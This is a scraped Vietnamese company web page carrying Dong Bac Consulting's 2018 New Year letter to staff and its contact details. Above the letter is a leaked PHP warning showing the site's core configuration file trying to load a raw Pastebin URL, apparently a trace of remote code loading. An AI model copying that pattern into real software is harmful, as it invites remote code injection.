Warning: file_get_contents(http://pastebin.com/raw/MF2RHxMi): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/tuvandongb/domains/tuvandongbac.com.vn/public_html/app/Config/core.php on line 257 Thư chúc tết tới các thành viên DONG BAC consulting !

Thư chúc tết tới các thành viên DONG BAC consulting !

Thư chúc tết tới các thành viên DONG BAC consulting !
Một năm đã trôi qua!
Để có được những kết quả rất đáng trân trọng trong năm 2017 vừa qua, chúng tôi hiểu rằng có những thời khắc nước mắt đã rơi, mồ hôi đổ xuống, có cả những đóng góp kiên trì, rèn luyện hăng say và những sự hy sinh thầm lặng, của từng cá nhân và tập thể ĐÔNG BẮC chung tay đóng góp để tạo nên những thành quả đó.
Cũng nhờ đó, thành công không chỉ còn là mơ ước đối với chúng ta mà đã thành hiện thực, thành công không phải là tự ngộ nhận mà chính câu trả lời từ thành quả của từng cá nhân, từ ánh mắt khách hàng và ghi nhận của xã hội đối với tập thể ĐÔNG BẮC. Chúng ta đã đặt được những viên gạch nền móng đầu tiên cho ngôi nhà chung ĐÔNG BẮC và đây chính là tiền đề cho sự phát triển an toàn, bền vững của công ty cho những năm tiếp theo. 
Một năm mới đang đến, chặng đua mới đang chờ !
Năm 2018 sẽ là năm bản lề của sự thay đổi, là năm ĐÔNG BẮC sẽ tăng tốc và bứt phá trên chặng đua mới!
Chặng đua này, chúng ta sẽ không chạy bằng cơ bắp như linh dương, cũng chẳng chạy như sư tử; chúng ta cũng không chạy theo bầy đàn tự phát, dẫm đạp mà chúng ta sẽ chạy bằng trí tuệ, bằng sức mạnh của cả tập thể, chúng ta sẽ đua với thời gian và thách thức với chính mình ! Sẽ không chỉ là nước mắt rơi, sẽ không chỉ là mồ hôi đổ mà toàn thể CBNV sẽ phải phấn đấu nỗ lực hết mình, vượt qua mọi gian khó và thử thách để hình thành và vun đắp tài sản lớn nhất của cuộc đời mỗi con người đó là: Trí tuệ và bản lĩnh.
Bằng trí tuệ, công việc của chúng ta sẽ không chỉ đơn thuần là công cụ ghi nhận, sao chép mà sẽ làm cho giá trị xã hội tăng lên. Vẫn một con người đó, trí tuệ của chúng ta giúp năng suất lao động sẽ cao hơn; vẫn một đồng vốn đó, trí tuệ của chúng ta giúp hiệu quả sẽ nhiều hơn; vẫn một thời lượng đó trí tuệ của chúng ta giúp hữu ích hơn và đó là lời lý giải: hợp tác với ĐÔNG BẮC sẽ đem lại lợi ích gì cho khách hàng!
Bằng bản lĩnh, chúng ta sẽ khiêm nhường với thành công, bình tĩnh trước khó khăn; biến thách thức thành cơ hội, lấy điểm mạnh hạn chế điểm yếu, coi thất bại là bài học để thành công hơn và xây dựng một tập thể ngày càng đoàn kết cùng nhau tiến bộ.       
Trước chặng đua này, chúng ta khẳng định lại con đường đã lựa chọn là đúng đắn ! Hãy nắm tay nhau cùng cán đích nhé!
Trước thời khắc bước sang năm mới 2018, Hội đồng sáng lập, Hội đồng thành viên và Ban giám đốc gửi lời Chúc mừng năm mới tới toàn thể các đồng chí và gia đình. Chúc một năm mới sức khỏe và hạnh phúc!
Đối tác
CÔNG TY TNHH TƯ VẤN THUẾ-TÀI CHÍNH ĐÔNG BẮC
Địa chỉ : P 102, tòa nhà DN5B, Khu CC Quang Minh, P.Hoàng Văn Thụ, TP Bắc Giang, Tỉnh Bắc Giang
Điện thoại :02043 601882 / 02043 541 882 -  Fax:  02043 540488
Website: tuvandongbac.com.vn  -   Email: taxdongbac@gmail.com
 

Copyright @ 2008 Dong Bac Consulting